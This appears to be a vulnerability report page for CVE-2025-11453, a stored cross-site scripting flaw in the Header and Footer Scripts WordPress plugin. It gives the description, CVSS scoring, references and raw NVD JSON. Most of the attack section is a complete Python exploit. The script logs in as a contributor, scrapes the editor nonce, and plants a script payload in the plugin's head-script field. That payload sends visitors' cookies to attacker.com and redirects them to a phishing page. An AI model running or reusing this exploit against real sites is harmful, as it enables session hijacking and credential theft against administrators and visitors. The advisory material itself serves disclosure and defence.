Security Vulnerability Report
CVE-2025-11453 CVSS 6.4 MEDIUM

CVE-2025-11453

Published: 2026-01-09 12:15:51
Last Modified: 2026-04-15 00:35:42

Description

The Header and Footer Scripts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the _inpost_head_script parameter in all versions up to, and including, 2.3.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No CPE configuration data is attached to this record.

Affected product (from the description): Header and Footer Scripts plugin for WordPress, all versions up to and including 2.3.0.

Note that the record is not internally consistent on the upper bound: the Spanish-language description and the linked trac reference (shfs.php in the 2.2.2 tag) point to 2.2.2, while the English description says 2.3.0. Treat any install at 2.3.0 or below as affected until the plugin changelog confirms which release carries the fix.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11453 PoC - Stored XSS in Header and Footer Scripts plugin
# Author: Security Researcher
# Target: WordPress with Header and Footer Scripts plugin <= 2.3.0
#
# Flow: log in as a Contributor, open the post editor to obtain a draft post ID
# and its update nonce, then submit the post form with the plugin's
# _inpost_head_script field set to a script payload. The value is stored as
# post meta and printed into <head> whenever the post is viewed, including when
# an Editor or Administrator previews the pending submission.

import sys

import requests
from bs4 import BeautifulSoup

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "attacker_contributor"
PASSWORD = "attacker_password"


def login_wordpress(session, username, password):
    """Authenticate to WordPress as the contributor user.

    wp-login.php carries no nonce, so a plain form post is enough. Success is
    detected by a wordpress_logged_in_* cookie being set on the session.
    """
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': f'{TARGET_URL}/wp-admin/',
        'testcookie': '1',
    }
    session.post(f"{TARGET_URL}/wp-login.php", data=login_data)
    return any(c.name.startswith('wordpress_logged_in') for c in session.cookies)


def inject_xss_payload(session):
    """Inject the stored XSS payload via the _inpost_head_script parameter."""
    # Loading post-new.php creates an auto-draft. The edit form exposes the
    # draft's ID and its update-post_<ID> nonce as hidden inputs and submits
    # to post.php (not back to post-new.php).
    response = session.get(f"{TARGET_URL}/wp-admin/post-new.php")
    soup = BeautifulSoup(response.text, 'html.parser')
    nonce_tag = soup.find('input', {'id': '_wpnonce'})
    post_id_tag = soup.find('input', {'id': 'post_ID'})
    if nonce_tag is None or post_id_tag is None:
        print("[-] Could not find the editor nonce / post ID in post-new.php")
        return False

    # XSS payload - steals cookies and redirects to attacker
    xss_payload = ('<script>fetch(\'https://attacker.com/steal?c=\'+document.cookie);'
                   'document.location=\'https://attacker.com/phishing\';</script>')

    post_data = {
        'post_ID': post_id_tag['value'],
        'post_title': 'XSS Test Page',
        'content': 'This page contains stored XSS',
        '_inpost_head_script': xss_payload,
        'post_type': 'post',
        'post_status': 'pending',   # Contributors cannot publish, only submit for review
        'action': 'editpost',
        '_wpnonce': nonce_tag['value'],
    }
    response = session.post(f"{TARGET_URL}/wp-admin/post.php", data=post_data)
    if response.status_code != 200:
        print(f"[-] post.php returned HTTP {response.status_code}")
        return False
    print("[+] XSS payload submitted; post ID", post_id_tag['value'])
    print("[+] Anyone viewing or previewing that post will execute the payload")
    return True


def main():
    session = requests.Session()
    print("[*] CVE-2025-11453 - Header and Footer Scripts Stored XSS")
    print("[*] Target: WordPress + Header and Footer Scripts <= 2.3.0")
    if not login_wordpress(session, USERNAME, PASSWORD):
        print("[-] Login failed")
        sys.exit(1)
    print("[+] Login successful as contributor")
    if not inject_xss_payload(session):
        sys.exit(1)


if __name__ == "__main__":
    main()

References

https://plugins.trac.wordpress.org/browser/header-and-footer-scripts/tags/2.2.2/shfs.php#L119 (shfs.php, line 119, in the 2.2.2 tag)
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3442622%40header-and-footer-scripts&new=3442622%40header-and-footer-scripts&sfp_email=&sfph_mail= (plugin changeset 3442622)
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3444257%40header-and-footer-scripts&new=3444257%40header-and-footer-scripts&sfp_email=&sfph_mail= (plugin changeset 3444257)
https://www.wordfence.com/threat-intel/vulnerabilities/id/d658e087-8cc7-4653-af3c-407b6f73fb7b?source=cve (Wordfence advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-11453",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-09T12:15:50.620",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Header and Footer Scripts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the _inpost_head_script parameter in all versions up to, and including, 2.3.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."
      },
      {
        "lang": "es",
        "value": "El plugin Header and Footer Scripts para WordPress es vulnerable a Cross-Site Scripting Almacenado a través del parámetro _inpost_head_script en todas las versiones hasta la 2.2.2, inclusive, debido a una sanitización de entrada y un escape de salida insuficientes. Esto permite que atacantes autenticados, con acceso de nivel Colaborador o superior, inyecten scripts web arbitrarios en páginas que se ejecutarán cada vez que un usuario acceda a una página inyectada."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N",
            "baseScore": 6.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.1,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-79"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/header-and-footer-scripts/tags/2.2.2/shfs.php#L119",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3442622%40header-and-footer-scripts&new=3442622%40header-and-footer-scripts&sfp_email=&sfph_mail=",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3444257%40header-and-footer-scripts&new=3444257%40header-and-footer-scripts&sfp_email=&sfph_mail=",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d658e087-8cc7-4653-af3c-407b6f73fb7b?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}